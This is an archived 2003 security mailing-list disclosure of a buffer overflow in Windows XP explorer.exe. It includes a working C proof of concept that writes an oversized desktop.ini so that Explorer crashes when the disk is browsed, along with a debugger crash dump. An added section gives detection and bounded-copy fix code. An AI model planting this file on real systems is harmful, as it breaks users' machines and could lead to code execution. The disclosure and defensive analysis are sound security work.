Pantek Library

Buffer overflow in Explorer.exe

From: aT4r InsaN3 <at4r(at)hotmail.com>
Date: Wed May 07 2003 - 16:53:50 EDT


This bug allows a malicious attacker to execute data with the privileges of a user who is browsing the hard disk with Explorer.

tested against winxp SP1

example code provided.

/*

	Buffer Overflow in explorer.exe - Proof of Concept
	Tested only against: Windows XP SP1

	Found by aT4r@3wdesign.es

	Greetings to:
	- #Haxorcitos@efnet= { "Tarako", "Croulder", "Drakar" , "[back]", "tyr" }:
	- #localhost and #darknet


	Usage: just execute this file.
		This code will crash your explorer every time you try to browse your harddisk
		execute this program again to delete the evil file ;-)

	(3ec.464): Access violation - code c0000005 (first chance)
	First chance exceptions are reported before any exception handling.
	This exception may be expected and handled.
	eax=00410041 ebx=0012aca8 ecx=77e5e1c4 edx=002f0000 esi=00121b70 edi=000ece90
	eip=00410041 esp=0177dfb0 ebp=00410041 iopl=0         nv up ei pl zr na po nc
	cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010246
	00410041 ??               ???

	3W Design Security 2003.
	http://www.3WDesign.es/
*/

#include <direct.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <sys/stat.h>

#define BUFF 2300

int main(void){

	char path[256];
	char evil[BUFF+1]="";
	FILE *bof;
	struct stat st;
	printf("\n . .. ...: \tBuffer overflow in explorer.exe\t\t:... .. .\n . .. ...: \tProof of Concept (aT4r@3wdesign.es)\t:... .. .\n\n");

	/* Create a folder in the root of the current drive and mark it read-only;
	   Explorer only honours desktop.ini in folders with the read-only or system attribute */
	strcpy(path,"\\aT4r[at]3WDesign.es Security");
	mkdir(path);
	SetFileAttributes(path,FILE_ATTRIBUTE_READONLY);

	/* Second run: the evil file already exists, so remove it and quit */
	strcat(path,"\\desktop.ini");
	if (stat(path,&st)==0)
		{ remove(path);	exit(1);}	//just execute this program twice to remove this file :P

	/* First run: write a [.ShellClassInfo] header followed by BUFF 'A's;
	   Explorer overflows a fixed-size buffer while parsing it */
	bof=fopen(path,"w");
	if (bof==NULL)
		{ perror(path); return 1;}
	fputs("[.ShellClassInfo]\n",bof);
	memset(evil,'A',BUFF);
	fputs(evil,bof);
	fclose(bof);
	printf("evil file: %s Created. Try to browse your Harddisk O:-)\n",path);

	return 0;
}



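The register dump in the post ends with eip=ebp=eax=0x00410041. That value is the little-endian encoding of two UTF-16 'A' characters (0x0041 0x0041), which is consistent with the 'A's from desktop.ini being copied into a wide-character stack buffer and overwriting the saved frame pointer and return address. The following C is an added example, not code from the original post or from 3W Design: it models the two things a practitioner wants from a report like this, a scanner that flags desktop.ini content whose [.ShellClassInfo] section carries a line longer than a MAX_PATH-sized buffer, and the bounded copy the crashing parser should have used. It uses no Windows API so it builds and runs anywhere. The 260-byte threshold is an assumption (the real buffer size is not given in the post), and the sample desktop.ini contents are constructed for this example.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Assumption: the overflowed buffer is on the order of MAX_PATH (260) characters.
   The post does not give the real size; this is only the scanner's threshold. */
#define SAFE_VALUE_LIMIT 260

/* Length of the line starting at p, up to (not including) '\n' or end of string. */
static size_t line_len(const char *p)
{
    const char *nl = strchr(p, '\n');
    return nl ? (size_t)(nl - p) : strlen(p);
}

/* Exact match of the "[.ShellClassInfo]" header, tolerating a trailing '\r'. */
static int is_shellclassinfo_header(const char *line, size_t len)
{
    static const char hdr[] = "[.ShellClassInfo]";
    const size_t hl = sizeof(hdr) - 1;
    if (len > 0 && line[len - 1] == '\r')
        len--;
    return len == hl && memcmp(line, hdr, hl) == 0;
}

/* Walk a desktop.ini held in memory and return the longest line (in bytes)
   inside the [.ShellClassInfo] section; 0 if the section is absent. */
size_t longest_shellclassinfo_line(const char *ini)
{
    size_t longest = 0;
    int in_section = 0;
    const char *p = ini;

    while (*p) {
        size_t len = line_len(p);
        if (len > 0 && p[0] == '[')
            in_section = is_shellclassinfo_header(p, len);  /* any other header ends the section */
        else if (in_section && len > longest)
            longest = len;
        p += len;
        if (*p == '\n')
            p++;
    }
    return longest;
}

/* 1 if the content would be flagged by the scanner, 0 otherwise. */
int is_suspicious_desktop_ini(const char *ini)
{
    return longest_shellclassinfo_line(ini) > SAFE_VALUE_LIMIT;
}

/* The fix for the pattern that crashed: copy at most dstsz-1 bytes and NUL-terminate.
   Returns 0 on success, -1 if the value did not fit (reject it, do not truncate silently). */
int copy_value_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    if (dstsz == 0)
        return -1;
    if (n >= dstsz) {
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);
    return 0;
}

/* Helper for checking copy_value_bounded against a destination of dstsz bytes. */
int value_fits(const char *src, size_t dstsz)
{
    char tmp[512];
    if (dstsz > sizeof tmp)
        return 0;
    return copy_value_bounded(tmp, dstsz, src) == 0;
}

/* Constructed benign sample (not from the original post). */
const char *benign_ini =
    "[.ShellClassInfo]\r\nIconFile=%SystemRoot%\\system32\\shell32.dll\r\nIconIndex=3\r\n";

/* Build the hostile variant the PoC writes: the header followed by `fill` 'A's. */
size_t build_poc_ini(char *out, size_t outsz, size_t fill)
{
    static const char hdr[] = "[.ShellClassInfo]\n";
    const size_t hl = sizeof(hdr) - 1;
    if (outsz < hl + fill + 1)
        return 0;
    memcpy(out, hdr, hl);
    memset(out + hl, 'A', fill);
    out[hl + fill] = '\0';
    return hl + fill;
}

/* Longest [.ShellClassInfo] line of a PoC-style file with `fill` 'A's. */
size_t poc_longest_line(size_t fill)
{
    static char buf[8192];
    if (!build_poc_ini(buf, sizeof buf, fill))
        return 0;
    return longest_shellclassinfo_line(buf);
}

int main(void)
{
    printf("benign: longest=%zu suspicious=%d\n",
           longest_shellclassinfo_line(benign_ini), is_suspicious_desktop_ini(benign_ini));
    printf("poc:    longest=%zu suspicious=%d\n",
           poc_longest_line(2300), poc_longest_line(2300) > SAFE_VALUE_LIMIT);
    return 0;
}
```

The scanner deliberately keys on line length rather than on the 'A' byte pattern, because any byte value past the buffer size is the trigger; a hunt across a share for desktop.ini files would read each file into memory and pass it to longest_shellclassinfo_line. The bounded copy returns an error instead of truncating, since a truncated IconFile or CLSID value is not a usable result either.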

Received on Thu May 8 12:12:47 2003

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:38 EDT

